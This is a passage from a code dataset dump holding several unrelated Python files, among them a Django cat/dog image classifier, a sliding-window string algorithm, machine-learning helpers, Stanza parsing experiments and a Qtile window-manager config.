(12),\n t_time VARCHAR (10)\n);\"\"\"\n\ncursor.execute(table_create_command)\n# connection.commit()\n\nwith open(\"ski_stats\") as outfile:\n ski = csv.DictReader(outfile, fieldnames=[\"rank\", \"athlete\", \"age\", \"team\", \"NOC\", \"medal\", \"t_time\"])\n\n for row in ski:\n print(row)\n cursor.execute(\"INSERT INTO sports_data VALUES (%s, %s, %s, %s, %s, %s, %s);\",\n (int(row['rank']), row['athlete'],\n int(row['age']), row['team'], row['NOC'], row['medal'], row['t_time']))\n\nconnection.commit()\n\ncursor.close()\nconnection.close()","sub_path":"stats_migration.py","file_name":"stats_migration.py","file_ext":"py","file_size_in_byte":951,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"199611499","text":"\"\"\"\n测试代码用的\n\"\"\"\n\ntrainMatrix = r'C:\\Users\\12391\\Desktop\\TextClassification-master\\matrix\\train\\matrix.pkl'\ntestMatrix = r'C:\\Users\\12391\\Desktop\\TextClassification-master\\matrix\\test\\matrix.pkl'\nimport joblib\nimport sklearn.decomposition\nimport numpy as np\n\n# print(joblib.load(trainMatrix).shape)\n# print(joblib.load(testMatrix).shape)\n\na = [\n\t[1,2,3],\n\t[2,2,4],\n\t[2,3,5]\n]\na = np.array(a)\n# print(a)\n\nb = sklearn.decomposition.TruncatedSVD(n_components=2)\nc = b.fit_transform(a)\n# b.transform(a)\nprint(b.components_)\nprint(b.explained_variance_)\nprint(b.explained_variance_ratio_)\nprint(b.singular_values_)\nprint(c)","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":628,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"288534279","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[1]:\n\n\n# In this programme I took a radious from the user and found the area of the given radious\nradius = int(input(\" Please give the radius of your circle: \"))\n\narea = (22/7)*(radius)*(radius)\nprint (\"The area of your circle is: \" + str(area))\n\n\n# In[3]:\n\n\n# In this programme I asked the user to give a random file and see what extension is it.\nfile = input(\"Please a give a file name: \")\nprint (file)\nvar = len(file)\ninc = 0\nwhile inc < var :\n if file [inc] == (\".\") :\n break\n inc = inc+1\nprint(\"The file extension is : \" + file[inc+1:var])\n \n\n","sub_path":"Project_My_Captain.py","file_name":"Project_My_Captain.py","file_ext":"py","file_size_in_byte":612,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"520389372","text":"from django.shortcuts import render\nfrom django.http import HttpResponse\nfrom personal.models import ExampleModel\nfrom django.template import Template, Context\n\nimport cv2\nimport matplotlib.pyplot as plt\n\nfrom django import forms\n\nclass ImageUploadForm(forms.Form):\n\t\"\"\"\"Image upload form\"\"\"\n\timage = forms.ImageField()\n\n#/home/tensorflow/Desktop/Django/mysite/personal/pic_folder\ndef index (request):\n\t#return render(request, 'personal/home.html')\n\tif request.method == 'POST':\n\t\tform = ImageUploadForm(request.POST, request.FILES)\n\t\tif form.is_valid():\n\t\t\tm = ExampleModel()\n\t\t\t#m = ExampleModel.objects.get(pk=1)\n\t\t\tm.model_pic = form.cleaned_data['image']\n\t\t\tm.save()\n\t\t\t#res = CatsDogs(m.model_pic.url)\n\t\t\tres = CatsDogs(m.model_pic.url)\n\n\t\t\t#output = cv2.imread('personal/output.jpg', cv2.IMREAD_GRAYSCALE)\n\t\t\twith open ('personal/output.jpg', \"rb\") as f:\n\t\t\t\treturn HttpResponse(f.read(), content_type=\"image/png\")\n\n\treturn render(request, 'personal/home.html')\n\n'''\n\t\t\treturn render(request, 'personal/home.html', {'result':['You were classified as a', \n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\tstr(res[0]),\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t' with probability = ',\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\tstr(res[1])]}\n\t\t\t\t\t\t)\n'''\n\t\t\t#return HttpResponse('You were classified as a ' + str(res[0]) + ' with probability = ' + str(res[1]) + ' !' )\n\n\t\n\ndef contact(request):\n\n\tif request.method == 'POST':\n\t\tform = ImageUploadForm(request.POST, request.FILES)\n\t\tif form.is_valid():\n\t\t\tm = ExampleModel()\n\t\t\t#m = ExampleModel.objects.get(pk=1)\n\t\t\tm.model_pic = form.cleaned_data['image']\n\t\t\tm.save()\n\t\t\t#res = CatsDogs(m.model_pic.url)\n\t\t\tres = CatsDogs(m.model_pic.url)\n\n\t\t\treturn HttpResponse('You were classified as a ' + str(res[0]) + ' with probability = ' + str(res[1]) + ' !' )\n\n\t\t\t#return HttpResponse(m.model_pic, content_type=\"image/png\")\n\n\treturn render(request, 'personal/basic.html')\n\n\n\ndef upload_pic(request):\n\n\tif request.method == 'POST':\n\t\tform = ImageUploadForm(request.POST, request.FILES)\n\t\tif form.is_valid():\n\t\t\tm = ExampleModel()\n\t\t\t#m = ExampleModel.objects.get(pk=1)\n\t\t\tm.model_pic = form.cleaned_data['image']\n\t\t\tm.save()\n\t\t\treturn HttpResponse(\"image upload success \")\n\n\treturn HttpResponse(\"allowed only via POST\")\n\n\n\ndef CatsDogs(pic_url):\n\t#import matplotlib.pyplot as plt\n\t#import cv2\n\timport numpy as np \n\timport os\n\tfrom random import shuffle\n\t#from tqdm import tqdm\n\n\timport tflearn\n\tfrom tflearn.layers.conv import conv_2d, max_pool_2d\n\tfrom tflearn.layers.core import input_data, dropout, fully_connected\n\tfrom tflearn.layers.estimator import regression\n\n\timport tensorflow as tf\n\timport pickle\n\n\n\tIMG_SIZE = 50\n\tLR = 1e-3\n\n\n\ttf.reset_default_graph()\n\n\tconvnet = input_data(shape=[None, IMG_SIZE, IMG_SIZE, 1], name='input')\n\n\tconvnet = conv_2d(convnet, 32, 2, activation='relu')\n\tconvnet = max_pool_2d(convnet, 2)\n\n\tconvnet = conv_2d(convnet, 64, 2, activation='relu')\n\tconvnet = max_pool_2d(convnet, 2)\n\n\tconvnet = conv_2d(convnet, 32, 2, activation='relu')\n\tconvnet = max_pool_2d(convnet, 2)\n\n\tconvnet = conv_2d(convnet, 64, 2, activation='relu')\n\tconvnet = max_pool_2d(convnet, 2)\n\n\tconvnet = conv_2d(convnet, 32, 2, activation='relu')\n\tconvnet = max_pool_2d(convnet, 2)\n\n\tconvnet = conv_2d(convnet, 64, 2, activation='relu')\n\tconvnet = max_pool_2d(convnet, 2)\n\n\tconvnet = fully_connected(convnet, 1024, activation='relu')\n\tconvnet = dropout(convnet, 0.8)\n\n\tconvnet = fully_connected(convnet, 2, activation='softmax')\n\tconvnet = regression(convnet, optimizer='adam', learning_rate=LR, loss='categorical_crossentropy', name='targets')\n\n\tmodel = tflearn.DNN(convnet, tensorboard_dir='log')\n\n\n\tmodel.load(\"personal/DogsCats_20Epochs.tfl\")\n\n\timg_ = cv2.imread(pic_url, cv2.IMREAD_GRAYSCALE) #[0]\n\n\timg = cv2.resize(img_, (IMG_SIZE, IMG_SIZE)) \n\n\tdata = img.reshape(IMG_SIZE, IMG_SIZE, 1)\n\n\tmodel_out = model.predict([data])[0]\n\n\tprint(model_out)\n\n\tif np.argmax(model_out) == 1: str_label='Dog'\n\telse: str_label='Cat'\n\n\n\tfig = plt.figure()\n\n\tif str_label=='Dog':\n\t\tprob = \"{0:.3f}\".format(model_out[1])\n\t\ttitle = 'The neural network classified you as a DOG with probability =' + str(prob)\n\telse:\n\t\tprob = \"{0:.3f}\".format(model_out[0])\n\t\ttitle = 'The neural network classified you as a CAT with probability =' + str(prob)\n\n\tfig.suptitle(title, fontsize=14, fontweight='bold')\n\ty = fig.add_subplot(1,2,1)\n\ty.imshow(img_, cmap='gray')\n\tplt.title('You were classified as a ' + str_label)\n\ty.axes.get_xaxis().set_visible(False)\n\ty.axes.get_yaxis().set_visible(False)\n\n\n\tif str_label=='Dog':\n\t\ttarget = model_out[1]\n\t\twith open('personal/predictionsdict_dog.pickle', 'rb') as handle:\n\t\t\tp_dict = pickle.load(handle)\n\telse:\n\t\ttarget = model_out[0]\n\t\twith open('personal/predictionsdict_cat.pickle', 'rb') as handle:\n\t\t\tp_dict = pickle.load(handle)\n\n\tmin_diff = 1\n\tkey_closest = 1\n\tfor k in p_dict:\n\t\tdiff = abs(p_dict[k] - target)\n\t\tif diff < min_diff:\n\t\t\tmin_diff = diff\n\t\t\tkey_closest = k\n\n\n\tclosest_url = '/home/tensorflow/Desktop/TensorFlow/dogs_cats_data/dogs_cats_test/test/' + str(key_closest) + '.jpg'\n\tclosest_img = cv2.imread(closest_url, cv2.IMREAD_GRAYSCALE)\n\t#cv2.imshow('test', closest_img_)\n\t#print (closest_url)\n\t#closest_img = cv2.resize(closest_img_, (IMG_SIZE, IMG_SIZE)) \n\n\ty = fig.add_subplot(1,2,2)\n\ty.imshow(closest_img, cmap='gray')\n\tplt.title(\"Just like it did - \")\n\ty.axes.get_xaxis().set_visible(False)\n\ty.axes.get_yaxis().set_visible(False)\n\n\t#plt.show()\n\tplt.savefig('personal/output.jpg')\n \t\n\n\n\tif str_label=='Dog':\n\t\treturn ['Dog', model_out[1]]\n\treturn ['Cat', model_out[0]] \n\n\n\n\n\n\n","sub_path":"Django/mysite/personal/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":5486,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"158744672","text":"from telebot import types\nimport sqlite3\n\n\nimport functions as func\n\nadmin = types.InlineKeyboardMarkup(row_width=2)\nadmin.add(\n types.InlineKeyboardButton('Рассылка',callback_data='message'),\n types.InlineKeyboardButton('Статистика', callback_data='statistics'),\n types.InlineKeyboardButton('Назад', callback_data='menu')\n)\n\nmenu = types.ReplyKeyboardMarkup(row_width=2, resize_keyboard=True)\nmenu.add(\n types.KeyboardButton('📡 Спасибо'),\n types.KeyboardButton('👤 За внимание'),\n types.KeyboardButton('⭐️ Тут кнопки меню')\n)\n","sub_path":"keyboard.py","file_name":"keyboard.py","file_ext":"py","file_size_in_byte":607,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"206726128","text":"'''\nGiven two strings s and t of lengths m and n respectively, return the minimum window substring of s such that every character in t (including duplicates) is included in the window. If there is no such substring, return the empty string '.\n\nThe testcases will be generated such that the answer is unique.\n\nA substring is a contiguous sequence of characters within the string.\n'''\nfrom math import inf\nfrom time import time\n\n\nclass Solution:\n def minWindow(self, s: str, t: str) -> str:\n if len(s) < len(t):\n return ''\n\n window, t_map = {}, {}\n for c in t:\n t_map[c] = 1 + t_map.get(c, 0)\n\n # Track characters\n have, need = 0, len(t_map)\n p_window, minLen = [0, 0], inf\n l = 0\n for r in range(len(s)):\n c = s[r]\n window[c] = 1 + window.get(c, 0)\n\n if c in t_map and window[c] == t_map[c]:\n have += 1\n\n while have == need:\n if (r - l + 1) < minLen:\n p_window = [l, r]\n minLen = r - l + 1\n # Remove from window and increment left pointer\n window[s[l]] -= 1\n if s[l] in t_map and window[s[l]] < t_map[s[l]]:\n have -= 1\n l += 1\n\n l, r = p_window\n return s[l : r + 1] if minLen != inf else ''\n\n def reference(self, s: str, t: str) -> str:\n if t == '':\n return ''\n\n countT, window = {}, {}\n for c in t:\n countT[c] = 1 + countT.get(c, 0)\n\n have, need = 0, len(countT)\n res, resLen = [-1, -1], float('infinity')\n l = 0\n for r in range(len(s)):\n c = s[r]\n window[c] = 1 + window.get(c, 0)\n\n if c in countT and window[c] == countT[c]:\n have += 1\n\n while have == need:\n # Update our result\n if (r - l + 1) < resLen:\n res = [l, r]\n resLen = r - l + 1\n # Pop from the left of our window\n window[s[l]] -= 1\n if s[l] in countT and window[s[l]] < countT[s[l]]:\n have -= 1\n l += 1\n\n l, r = res\n return s[l : r + 1] if resLen != float('infinity') else ''\n\n def quantify(self, test_cases, runs=50000):\n sol_start = time()\n for i in range(runs):\n for case in test_cases:\n if i == 0:\n print(self.minWindow(*case))\n else:\n self.minWindow(*case)\n print(f'Runtime for our solution: {time() - sol_start}\\n')\n\n ref_start = time()\n for i in range(0, runs):\n for case in test_cases:\n if i == 0:\n print(self.reference(*case))\n else:\n self.reference(*case)\n print(f'Runtime for reference: {time() - ref_start}')\n\n\nif __name__ == '__main__':\n test = Solution()\n test_cases = [('ADOBECODEBANC', 'ABC'), ('a', 'a'), ('a', 'aa')]\n test.quantify(test_cases)\n","sub_path":"Blind 75/03 - Sliding Window/76-minimum-window-substring.py","file_name":"76-minimum-window-substring.py","file_ext":"py","file_size_in_byte":3117,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"425381551","text":"import utils\nimport numpy as np\n\nboard_size = len(utils.rows)\n\ndef value_to_nparray(values):\n ret = np.zeros((board_size,board_size,board_size),dtype=bool)\n for r in range(len(utils.rows)):\n for c in range(len(utils.cols)):\n box_key = utils.rows[r]+utils.cols[c]\n box_value = values[box_key]\n for v in range(board_size):\n ret[r][c][v] = str(v+1) in box_value\n return ret\n\ndef nparray_to_value(nparray):\n ret = {}\n for r in range(len(utils.rows)):\n for c in range(len(utils.cols)):\n box_key = utils.rows[r]+utils.cols[c]\n nparray_ii = nparray[r][c]\n ret[box_key] = ''.join([str(i+1) for i in range(board_size) if nparray_ii[i]])\n return ret\n\nif __name__ == '__main__':\n import unittest\n import solution_test\n\n class SudokuConvertTest(unittest.TestCase):\n def test_value_to_nparray(self):\n diagonal_grid = '2.............62....1....7...6..8...3...9...7...6..4...4....8....52.............3'\n values = utils.grid_values(diagonal_grid)\n nparray = value_to_nparray(values)\n self.assertEqual(nparray[0][0][0],False)\n self.assertEqual(nparray[0][0][1],True)\n self.assertEqual(nparray[0][0][2],False)\n self.assertEqual(nparray[0][1][0],True)\n self.assertEqual(nparray[0][1][8],True)\n self.assertEqual(nparray[1][5][5],True)\n self.assertEqual(nparray[1][5][4],False)\n self.assertEqual(nparray[1][5][6],False)\n \n def test_nparray_to_value(self):\n diagonal_grid = '2.............62....1....7...6..8...3...9...7...6..4...4....8....52.............3'\n values = utils.grid_values(diagonal_grid)\n nparray = value_to_nparray(values)\n values0 = nparray_to_value(nparray)\n self.assertEqual(values,values0)\n\n unittest.main()\n","sub_path":"sudoku_convert.py","file_name":"sudoku_convert.py","file_ext":"py","file_size_in_byte":1930,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"114358244","text":"import numpy as np\nimport matplotlib.pyplot as plt\nfrom implementations import *\n\n\"\"\" GENERAL FUNCTION \"\"\"\n\n# Sigmoid function that bring back x in the interval [0, 1]\ndef sigmoid(x):\n s = 0.5 * (1 + np.tanh(0.5*x))\n return s\n\n# Given a matrix 'x' and the degree, return the polynomial expansion of \n# the matrix.\ndef build_poly(x, degree):\n poly = x\n for deg in range(2, degree+1):\n poly = np.concatenate((poly, np.power(x, deg)), axis = 1)\n return poly\n\n# Given an array 'array', return a new array where the value -1 have\n# been replaced by zero.\ndef neg_to_zero(array):\n ret = np.zeros(len(array))\n for i, v in enumerate(array):\n if v == -1:\n ret[i] = 0\n else:\n ret[i] = v\n return ret\n\n# Given an array 'array', return a new array where the value zero have\n# been replaced by -1.\ndef zero_to_neg(array):\n ret = np.zeros(len(array))\n for i, v in enumerate(array):\n if v == 0:\n ret[i] = -1\n else:\n ret[i] = v\n return ret\n\n# Given train features and test features, return the standardized version\n# of those array.\ndef standardize(x_train, x_test):\n mean = np.mean(x_train)\n norm = np.linalg.norm(x_train)\n x_train_std = (x_train - mean)/norm\n x_test_std = (x_test - mean)/norm\n return x_train_std, x_test_std\n\n# Return the indices of the features of the array 'array' where the ratio\n# of values 'value' is greater than threshold.\ndef get_na_columns(array, threshold, value):\n na_indices = []\n for ind, row in enumerate(array.T):\n count_na = 0\n for j in range(len(row)):\n if row[j] == value:\n count_na += 1\n if (count_na/len(row)) > threshold:\n na_indices.append(ind)\n return na_indices\n\n# Given the array of features x, predict the undefined values of the\n# columns 'indices' of x, using least squares.\n# Return x with the predicted values instead of the undefined values,\n# and the models wi's used to find the predictions.\ndef predict_na_columns(x, indices):\n ws = []\n for i in indices:\n x_i_train, y_i_train, x_i_test, indices_to_drop_i, indices_to_keep_i = split_data(x, i, indices)\n w_i, loss_i = least_squares(y_i_train, x_i_train)\n y_i_test = x_i_test @ w_i\n y_i_arr = np.column_stack((indices_to_drop_i, y_i_test))\n x = put_back_y(x, i, y_i_arr)\n ws.append(w_i)\n return x, ws\n\n# Given the array of features x, and the model w, predict the undefined \n# values of the columns 'indices' of x.\n# Return x with the predicted values instead of the undefined values.\ndef set_predict_na_columns(x, w, indices):\n for i in indices:\n x_i_train, y_i_train, x_i_test, indices_to_drop_i, indices_to_keep_i = split_data(x, i, indices)\n y_i_test = x_i_test @ w\n y_i_arr = np.column_stack((indices_to_drop_i, y_i_test))\n x = put_back_y(x, i, y_i_arr)\n return x\n\n# Given a vector 'vect', return the indices to drop, corresponding to the\n# indices where the value is -999 in the vector and the indices to keep, \n# corresponding to the indices of the well defined values in the vector.\ndef get_indices(vect):\n indices_to_drop = []\n indices_to_keep = []\n for i, value in enumerate(vect):\n if value == int(-999):\n indices_to_drop.append(i)\n else:\n indices_to_keep.append(i)\n return indices_to_drop, indices_to_keep\n\n# Given a matrix 'array', the indice of a column and a vector 'y_fin',\n# replace the values of the columns by those of the vector 'y_fin'.\ndef put_back_y(array, ind_col, y_fin):\n for ind, pair in enumerate(y_fin):\n index, valeur = pair\n index = int(index)\n array[index][ind_col] = valeur \n return array\n\n# Given a matrix 'x', separate the array into x_train, x_test,\n# y_train, y_test, in order to predict the undefined values of the\n# matrix. It also returns the well defined value indices and the\n# undefined value indices.\ndef split_data(x, indice, indices):\n y = x.T[indice].T\n indices_to_drop_i, indices_to_keep_i = get_indices(y)\n y_i_train = np.take(y, indices_to_keep_i)\n x_train_tr = np.delete(x, indices, axis = 1)\n x_i_train = np.take(x_train_tr, indices_to_keep_i, axis = 0)\n x_i_test = np.take(x_train_tr, indices_to_drop_i, axis = 0)\n return x_i_train, y_i_train, x_i_test, indices_to_drop_i, indices_to_keep_i\n \n\"\"\" CROSS VALIDATION VIZUALIZATION\"\"\"\n\n# Displays the rmse of train and test set depending on the lambda.\ndef cross_validation_visualization(lambds, mse_tr, mse_te):\n plt.semilogx(lambds, mse_tr, marker=\".\", color='b', label='train error')\n plt.semilogx(lambds, mse_te, marker=\".\", color='r', label='test error')\n plt.xlabel(\"lambda\")\n plt.ylabel(\"rmse\")\n plt.title(\"cross validation\")\n plt.legend(loc=2)\n plt.grid(True)\n \n# Build k-indices for k-fold.\ndef build_k_indices(y, k_fold, seed):\n num_row = y.shape[0]\n interval = int(num_row / k_fold)\n np.random.seed(seed)\n indices = np.random.permutation(num_row)\n k_indices = [indices[k * interval: (k + 1) * interval] for k in range(k_fold)]\n return np.array(k_indices)\n\n# Return the loss of ridge regression.\ndef cross_validation(y, x, k_indices, k, lambda_, degree):\n # get k'th subgroup in test, others in train: TODO\n test_indices = k_indices[k]\n train_indices = np.concatenate((k_indices[:k], k_indices[k+1:])).flatten()\n \n x_train = x[train_indices]\n y_train = y[train_indices]\n x_test = x[test_indices]\n y_test = y[test_indices]\n \n # form data with polynomial degree: TODO\n m_train = build_poly(x_train, degree)\n m_test = build_poly(x_test, degree)\n \n # ridge regression: TODO\n w_train, loss_train = ridge_regression(y_train, m_train, lambda_)\n \n # calculate the loss for train and test data: TODO\n loss_tr = compute_mse(y_train, m_train, w_train)\n loss_te = compute_mse(y_test, m_test, w_train)\n\n return loss_tr, loss_te\n\n# Cross validation demo.\ndef cross_validation_demo(y, x, degree):\n seed = 1\n k_fold = 4\n lambdas = np.logspace(-12, 0, 30)\n \n # split data in k fold\n k_indices = build_k_indices(y, k_fold, seed)\n \n # define lists to store the loss of training data and test data\n rmse_tr = []\n rmse_te = []\n for lambda_ in lambdas:\n err_train = []\n err_test = []\n for k in range (k_fold):\n loss_tr, loss_te = cross_validation(y, x, k_indices, k, lambda_, degree) \n err_train.append(np.sqrt(2*loss_tr))\n err_test.append(np.sqrt(2*loss_te))\n rmse_tr.append(sum(err_train)/k_fold)\n rmse_te.append(sum(err_test)/k_fold)\n cross_validation_visualization(lambdas, rmse_tr, rmse_te)","sub_path":"Project 1/Polo/functions.py","file_name":"functions.py","file_ext":"py","file_size_in_byte":6756,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"53103384","text":"from django.contrib import admin\nfrom django.urls import path, include\nfrom django.conf.urls import url\nfrom app import api,views\n\nurlpatterns = [\n path('', include('frontend.urls')),\n path('admin/', admin.site.urls),\n path('api/',include('app.urls')),\n path('api/login/', api.LoginAuthToken.as_view()),\n path('api/logout/', api.LogoutViewSet.as_view()),\n path('api/user/', api.UserView.as_view()),\n path('current/', api.UserView.as_view(), name='user-current'),\n path('upload/', api.FileUpload.as_view(), name ='file_upload')\n]\n","sub_path":"croc_app/croc_app/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":545,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"619960655","text":"def joint_number_(text_list): #match longer fraction such as ( 1 / 1000000 )\n #text_list='( | ( 5 / 7 ) - ( 1 / 14 ) + ( 5 / 6 ) ) / ( 5 / 42 ) .'.split(\" \")\n #text_list=\"计 ( 123 (1/10000) ) 算 ( 1 / 2 ) + ( 1 / 6 ) + ( 1 / 12 ) + ( 1 / 20 ) + … + ( 1 / 380 ) = 多 少 .\".split()\n text_list=\"苹 果 树 比 梨 树 少 ( 3 / 8 ) , 梨 树 比 苹 果 树 多 ( ( ( ) ) / ( ( ) ) )\".split(\" \")\n new_list=[]\n i=0\n while i < len(text_list):\n if text_list[i] == '(':\n try:\n j=text_list[i:].index(')')\n if i+1==i+j:\n j=None\n if \"(\" in text_list[i+1:i+j+1]:\n j=None\n except:\n j=None\n if j:\n stack=[]\n flag=True\n idx=0\n for temp_idx,word in enumerate(text_list[i:i+j+1]):\n if word in [\"(\",\")\",\"/\"] or word.isdigit():\n stack.append(word)\n idx=temp_idx\n else:\n flag=False\n break\n if \"/\" not in stack:\n flag=False\n if flag:\n number=''.join(stack)\n new_list.append(number)\n else:\n for word in stack:\n new_list.append(word)\n i+=idx+1\n else:\n new_list.append(text_list[i])\n i+=1\n else:\n new_list.append(text_list[i])\n i+=1\n return new_list\n#joint_number_([])\nfrom typing import Counter\nimport torch\nfrom torch import nn, stack\nfrom torch.nn import functional as F\nimport stanza\nimport copy\ndef get_group_num(doc,sent_len,num_pos):\n heads_deprel_upos=doc.get(['head','deprel','upos','text'])\n num_pos=[pos-sent_len for pos in num_pos]\n for idx,x in enumerate(heads_deprel_upos):\n print(idx,x)\n for n_pos in num_pos:\n pos_stack=[]\n group_num=[]\n #group_num.append(n_pos)\n pos_stack.append([n_pos,heads_deprel_upos[n_pos][1]])\n count=0\n head_pos=heads_deprel_upos[n_pos][0]\n head_dep=heads_deprel_upos[n_pos][1]\n for idx,x in enumerate(heads_deprel_upos):\n if heads_deprel_upos[idx][0]==head_pos and n_pos!=idx:\n deprel=heads_deprel_upos[idx][1]\n pos_stack.append([idx,deprel])\n while pos_stack:\n count+=1\n pos_dep=pos_stack.pop(0)\n pos=pos_dep[0]\n dep=pos_dep[1]\n head_pos=heads_deprel_upos[pos][0]-1\n upos=heads_deprel_upos[pos][2]\n if upos not in ['NOUN','NUM','ADJ','VERB','DET', 'SYM']:\n continue\n elif upos == 'NOUN' and dep not in ['compound','nsubj:pass','nsubj','compound']:\n continue\n elif upos == 'VERB' and dep not in ['conj','root']:\n continue\n elif upos == 'ADJ' and dep not in ['amod']:\n continue\n elif upos == 'DET' and dep not in ['advmod']:\n continue\n elif upos == 'SYM' and dep not in ['obl']:\n continue\n else:\n group_num.append(pos)\n if head_pos>=0:\n head_dep=heads_deprel_upos[head_pos][1]\n if [head_pos,head_dep] in pos_stack:\n pass\n else:\n pos_stack.append([head_pos,head_dep])\n print(count)\n print(group_num)\n return []\ndef get_group_num_(token_list,sent_len,num_pos):\n group_nums=[]\n num_pos=[pos-sent_len for pos in num_pos]\n for n_pos in num_pos:\n pos_stack=[]\n group_num=[]\n pos_stack.append([n_pos,token_list[n_pos][\"deprel\"]])\n count=0\n head_pos=token_list[n_pos]['head']\n for idx,x in enumerate(token_list):\n if x['head']==head_pos and n_pos!=idx:\n deprel=x[\"deprel\"]\n pos_stack.append([idx,deprel])\n while pos_stack:\n count+=1\n pos_dep=pos_stack.pop(0)\n pos=pos_dep[0]\n dep=pos_dep[1]\n head_pos=token_list[pos]['head']-1\n upos=token_list[pos]['upos']\n if upos not in ['NOUN','NUM','ADJ','VERB','DET', 'SYM']:\n continue\n elif upos == 'NOUN' and dep not in ['compound','nsubj:pass','nsubj','compound']:\n continue\n elif upos == 'VERB' and dep not in ['conj','root']:\n continue\n elif upos == 'ADJ' and dep not in ['amod']:\n continue\n elif upos == 'DET' and dep not in ['advmod']:\n continue\n elif upos == 'SYM' and dep not in ['obl']:\n continue\n else:\n group_num.append(pos+sent_len)\n if head_pos>=0:\n head_dep=token_list[head_pos]['deprel']\n if [head_pos,head_dep] in pos_stack:\n pass\n else:\n pos_stack.append([head_pos,head_dep])\n group_nums.append(group_num)\n return group_nums\n# nlp=stanza.Pipeline('en',processors='depparse,tokenize,pos,lemma',tokenize_pretokenized=True)\n# text=\"348 teddy bears are sold for $ 23 each . There are total 470 teddy bears in a store and the remaining teddy bears are sold for $ 17 each . How much did the store earn after selling all the teddy bears .\"\n# doc=nlp(text)\n# print(doc)\n# num_pos=[0, 7,13,28]\n# token_lists=doc.to_dict()\n# sentences=text.split(\".\")\n# sent_len=[]\n# num_pos=[0, 7,13,28]\n# num_pos_list=[]\n# last_pos_list=[]\n# l=0\n# for idx,sentence in enumerate(sentences):\n# sentence=sentence+' .'\n# sentences[idx]=sentence\n# sent_len.append(l)\n# l+=len(sentence.split(\" \"))\n# n_pos=[pos for pos in num_pos if pos random_nbr:\n print(\"\\033[1m Plus grand \\033[0m\")\n user_input = input(\"\\033[1m Saisie : \\033[0m\")\n \n elif int(user_input) == random_nbr:\n print(\"\\033[1m Félicitations vous avez gagné ! \\033[0m\") \n break\n \nif user_input == 'q':\n msg()\n\n\n\n \n \n\n\n\n\n \n\n \n\n\n\n\n\n ","sub_path":"scripts/1d-mol.py","file_name":"1d-mol.py","file_ext":"py","file_size_in_byte":1331,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"443443015","text":"from libqtile.config import Key, Screen, Group, Drag, Click\nfrom libqtile.command import lazy\nfrom libqtile import layout, bar, widget\n\nshift = \"shift\"\nctrl = \"control\"\nalt = \"mod1\"\nwin = \"mod4\"\nmod = \"mod4\"\n\nkeys = [\n\n\t# Qtile System Controls\n\tKey([ctrl, alt], \"Delete\", \n\t\tlazy.shutdown()),\n\tKey([ctrl, alt], \"r\",\n\t\tlazy.restart()),\n\n\t# Set window style\n\tKey([alt], \"s\",\n\t\tlazy.group.setlayout('stack')),\n\tKey([alt], \"d\",\n\t\tlazy.group.setlayout('max')),\n\tKey([alt], \"f\",\n\t\tlazy.window.toggle_fullscreen()),\n\n\t# Close window\n\tKey([alt], \"x\",\n\t\tlazy.window.kill()),\n\n\t# Switch between windows on the same stack\n\tKey([alt], \"h\",\n\t\tlazy.layout.previous()),\n\tKey([alt], \"l\",\n\t\tlazy.layout.next()),\n\tKey([alt], \"k\",\n\t\tlazy.layout.down()),\n\tKey([alt], \"j\",\n\t\tlazy.layout.up()),\n\n\t# Switch between windows on the same screen\n\tKey([alt], \"Left\",\n\t\tlazy.layout.previous()),\n\tKey([alt], \"Right\",\n\t\tlazy.layout.next()),\n\tKey([alt], \"Up\",\n\t\tlazy.layout.down()),\n\tKey([alt], \"Down\",\n\t\tlazy.layout.up()),\n\n\t# Move windows on the stack\n\tKey([alt, shift], \"h\",\n\t\tlazy.layout.client_to_previous()),\n\tKey([alt, shift], \"l\",\n\t\tlazy.layout.client_to_next()),\n\tKey([alt, shift], \"k\",\n\t\tlazy.layout.shuffle_down()),\n\tKey([alt, shift], \"j\",\n\t\tlazy.layout.shuffle_up()),\n\n\t# Move windows on the screen\n\tKey([alt, shift], \"Left\",\n\t\tlazy.layout.client_to_previous()),\n\tKey([alt, shift], \"Right\",\n\t\tlazy.layout.client_to_next()),\n\tKey([alt, shift], \"Up\",\n\t\tlazy.layout.shuffle_down()),\n\tKey([alt, shift], \"Down\",\n\t\tlazy.layout.shuffle_up()),\n\n\t# Split and flip windows on the screen\n\tKey([alt], \"space\",\n\t\tlazy.layout.toggle_split()),\n\tKey([alt, shift], \"space\",\n\t\tlazy.layout.rotate()),\n\n\t# Dmenu quick commands\n\tKey([alt, shift], \"Return\",\n\t\tlazy.spawncmd()),\n\tKey([alt], \"g\",\n\t\tlazy.switchgroup()),\n\n\t# Spawn app shortucts\n\tKey([alt], \"Return\",\n\t\tlazy.spawn(\"gnome-terminal\")),\n\tKey([alt], \"BackSpace\",\n\t\tlazy.spawn(\"urxvt256c\")),\n\tKey([alt, shift], \"d\",\n\t\tlazy.spawn(\"dwb\")),\n\tKey([alt, shift], \"f\",\n\t\tlazy.spawn(\"firefox\")),\n\tKey([alt, shift], \"g\",\n\t\tlazy.spawn(\"google-chrome-stable\")),\n\tKey([alt, shift], \"p\",\n\t\tlazy.spawn(\"gnome-control-center\")),\n\tKey([alt, shift], \"s\",\n\t\tlazy.spawn(\"spotify\")),\n\tKey([alt, shift], \"n\",\n\t\tlazy.spawn(\"nautilus\")),\n\t\n\t# Enable audio buttons\n Key([], \"XF86AudioRaiseVolume\",\n lazy.spawn(\"amixer -c 0 